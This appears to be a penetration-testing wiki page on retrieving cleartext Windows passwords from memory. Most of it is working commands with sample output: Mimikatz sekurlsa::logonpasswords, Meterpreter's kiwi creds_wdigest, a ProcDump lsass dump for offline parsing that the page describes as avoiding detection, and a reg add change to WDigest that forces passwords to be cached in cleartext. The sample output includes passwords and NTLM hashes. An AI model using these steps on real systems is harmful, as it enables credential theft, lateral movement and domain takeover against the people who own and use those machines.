Retrieve Windows passwords
This page deals with retrieving windows clear text credentials from memory and WDigest.
Introduction
Retrieving Windows clear text password allows an attacker testing for password reuse, moving laterally, getting foothold on a domain, etc.
Retrieve clear text passwords from memory
Windows historically stored cleartext passwords in RAM, with lsass process. It allows users with admin privileges to dump clear text passwords from memory with tools like Mimikatz, wce, etc.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
[...]
If you use Meterpreter on Win10 / Win2016, the only thing that works is Kiwi WDigest module.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.1.1 20170608 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN01$ WORKGROUP (null)
localadmin WIN01 L0c4l4dm1n
Minidump
To avoid being detected during assessments, we can use Minidump technic.
It consists in dumping lsass process on the target computer with a legit tool (Procdump by Sysinternals), and parse the dump to retrieve passwords with Mimikatz locally on the attacker machine.
On the attacker machine:
C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.
To succesfully extract passwords from this dump, retrieve it locally on a machine with the same major version and the same architecture than the victime machine.

Then use Mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 141237
User Name : sekur_000
Domain : WINDOWS-8
msv :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
tspkg :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* Password : waza1234/
wdigest :
* Username : sekurlsa@live.fr
* Domain : MicrosoftAccount
* Password : waza1234/
Since Mimikatz Nostalgia (2019/05/04), you can parse every dumps with every Windows version/architecture.
WDigest
You can force Windows to store cleartext credentials in memory by simply modifying the value of the WDigest reg key. Clear text passwords will be stored anew once users connect again.
To enable it, change the key value to 1:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
To disable it, change the key value to 0:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0
To take effect, conditions are required :
Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
Adding requires lock
Removing requires signout
Win10:
Adding requires signout
Removing requires signout
Win2016:
Adding requires lock
Removing requires reboot
Lock, signout, and reboot from CMD
To lock a session, type:
rundll32.exe user32.dll,LockWorkStation
To signout, type:
query session
logoff <sessionToClose_Number>
To reboot, type:
shutdown /r /t 0
References
Last updated